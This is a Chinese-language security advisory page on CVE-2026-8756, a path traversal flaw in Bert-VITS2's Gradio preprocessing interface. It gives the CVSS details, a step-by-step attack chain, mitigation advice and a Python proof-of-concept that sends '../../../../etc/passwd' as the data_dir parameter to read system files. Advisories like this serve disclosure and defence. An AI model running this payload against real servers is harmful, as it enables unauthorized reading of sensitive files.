IPBUF安全漏洞报告
English
CVE-2026-8756 CVSS 7.3 高危

CVE-2026-8756 Bert-VITS2路径遍历漏洞

披露日期: 2026-05-17
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-8756
漏洞类型
路径遍历
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
fishaudio Bert-VITS2

相关标签

路径遍历CVE-2026-8756Bert-VITS2Gradio远程漏洞

漏洞概述

该漏洞存在于 fishaudio Bert-VITS2 的 Gradio Interface 组件中,具体位于 `webui_preprocess.py` 文件的 `generate_config` 函数。由于未对 `data_dir` 参数进行充分过滤,攻击者可通过构造恶意路径实施路径遍历攻击。该漏洞无需认证即可远程利用,可能导致敏感信息泄露或数据篡改,当前厂商尚未发布修复方案。

技术细节

漏洞核心在于 `webui_preprocess.py` 中的 `generate_config` 函数直接使用了用户可控的 `data_dir` 参数进行文件系统操作,未对其进行规范化处理或白名单验证。攻击者可以通过在参数中插入 `../` 序列或绝对路径(如 `/etc/passwd`)来跳出预期的受限目录。由于 Gradio 接口默认暴露且无需登录(PR:N),远程攻击者可发送特制 HTTP 请求触发漏洞。CVSS 3.1 向量为 AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L,表明攻击复杂度低,且会对机密性、完整性和可用性造成低至中度影响。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,识别出运行 Bert-VITS2 且开启 Gradio Web UI 的目标服务器。
STEP 2
2. 漏洞探测
攻击者访问 Web 界面,确认 `generate_config` 接口是否存在且无需认证即可调用。
STEP 3
3. 构造攻击载荷
攻击者构造包含路径遍历字符(如 `../`)的 `data_dir` 参数,目标指向系统敏感文件(如 `/etc/passwd` 或配置文件)。
STEP 4
4. 发送恶意请求
攻击者向受害服务器发送 POST 请求,将恶意载荷注入到 `generate_config` 函数中。
STEP 5
5. 执行攻击与获取数据
服务器处理请求,由于缺乏过滤,应用程序读取了路径遍历后的文件内容并将其返回给攻击者,造成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-8756 # Exploiting path traversal in Bert-VITS2 webui_preprocess.py import requests def exploit(target_ip, target_port): # The vulnerable endpoint typically maps to the Gradio API url = f"http://{target_ip}:{target_port}/api/generate_config" # Payload attempting to read system files # Adjust the number of '../' based on the application's root directory depth payload = { "data_dir": "../../../../etc/passwd" } try: print(f"[*] Sending payload to {url}...") response = requests.post(url, data=payload, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check response for file content.") print(response.text) else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[!] Error during exploitation: {e}") if __name__ == "__main__": # Replace with actual target details exploit("127.0.0.1", "7860")

影响范围

fishaudio Bert-VITS2 (commit 8f7fbd8c4770965225d258db548da27dc8dd934c 及更早版本)

防御指南

临时缓解措施
建议立即在防火墙层面限制对 Gradio Web UI 端口(默认为 7860)的外部访问,仅允许可信 IP 连接。由于官方暂未修复,用户需手动修改源代码 `webui_preprocess.py`,在处理 `data_dir` 前添加路径安全检查逻辑,或者暂时禁用该预处理功能。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表